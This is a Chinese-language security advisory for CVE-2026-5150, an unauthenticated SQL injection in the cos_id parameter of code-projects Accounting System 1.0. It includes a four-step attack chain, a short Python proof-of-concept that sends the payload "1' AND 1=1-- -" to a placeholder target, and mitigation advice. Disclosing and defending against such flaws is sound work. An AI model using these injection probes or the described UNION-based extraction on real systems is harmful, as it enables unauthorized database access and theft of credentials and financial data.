CVE-2026-5150 CVSS 7.3 高危

CVE-2026-5150: code-projects Accounting System 1.0 SQL注入漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5150

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Accounting System

漏洞概述

code-projects Accounting System 1.0版本中的/viewin_costumer.php文件存在严重安全漏洞。问题出在参数处理组件对用户输入的cos_id参数缺乏有效的过滤和验证。远程攻击者可利用此漏洞，通过精心构造的恶意SQL语句发动SQL注入攻击。这可能导致敏感数据库信息泄露、数据完整性受损或服务中断。鉴于漏洞利用代码已公开，风险极高。

技术细节

该漏洞属于典型的SQL注入漏洞，具体存在于code-projects Accounting System 1.0的/viewin_costumer.php文件中。漏洞产生的根本原因在于参数处理组件未对用户输入的cos_id参数进行严格的类型检查或安全过滤，直接将其拼接到后端SQL查询语句中。攻击者无需经过身份验证（PR:N），即可通过网络远程发起攻击（AV:N）。利用方式主要涉及在HTTP请求的cos_id参数中注入特定的SQL语法（如单引号逃逸、联合查询等）。成功的攻击可导致数据库中的敏感数据（如用户名、密码、财务记录）被非法读取（C:L），数据被篡改或删除（I:L），严重情况下可能导致数据库服务瘫痪（A:L）。由于漏洞利用代码已公开，建议立即排查系统并修补，以防被自动化扫描工具攻击。

攻击链分析

STEP 1

侦察

攻击者识别运行code-projects Accounting System 1.0的目标服务器，并确定存在viewin_costumer.php接口。

STEP 2

漏洞探测

攻击者向viewin_costumer.php发送包含cos_id参数的特殊构造请求（如单引号），观察服务器响应是否包含数据库错误信息。

STEP 3

漏洞利用

利用cos_id参数注入恶意SQL语句（如UNION SELECT），绕过应用逻辑，执行非授权的数据库查询命令。

STEP 4

数据窃取/破坏

提取数据库中的敏感信息（用户凭证、财务数据），或进行添加、删除、修改操作，破坏数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sql_injection(url):
    # The vulnerable parameter is 'cos_id' in viewin_costumer.php
    target = f"{url}/viewin_costumer.php"
    # Basic SQL injection test payload to check for syntax errors
    payload = {
        "cos_id": "1' AND 1=1-- -"
    }
    
    try:
        response = requests.get(target, params=payload, timeout=5)
        if response.status_code == 200:
            print("[+] Potential SQL Injection vulnerability detected.")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print("[-] Target may not be vulnerable or is down.")
    except Exception as e:
        print(f"[!] Error occurred: {e}")

if __name__ == "__main__":
    target_url = "http://example.com" # Replace with actual target
    check_sql_injection(target_url)

影响范围

code-projects Accounting System 1.0

防御指南

临时缓解措施

建议在WAF（Web应用防火墙）中添加针对该漏洞特征的防护规则，拦截对cos_id参数的恶意SQL注入尝试。如无法立即修复，可暂时限制对/viewin_costumer.php页面的公网访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5150
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5150
3 Details https://www.cvedetails.com/cve/CVE-2026-5150/
4 VulDB https://vuldb.com/cve/CVE-2026-5150
5 Link https://code-projects.org/
6 Link https://github.com/Xu-Zhihan/CVE/issues/11
7 Link https://vuldb.com/submit/780199
8 Link https://vuldb.com/vuln/354183
9 Link https://vuldb.com/vuln/354183/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表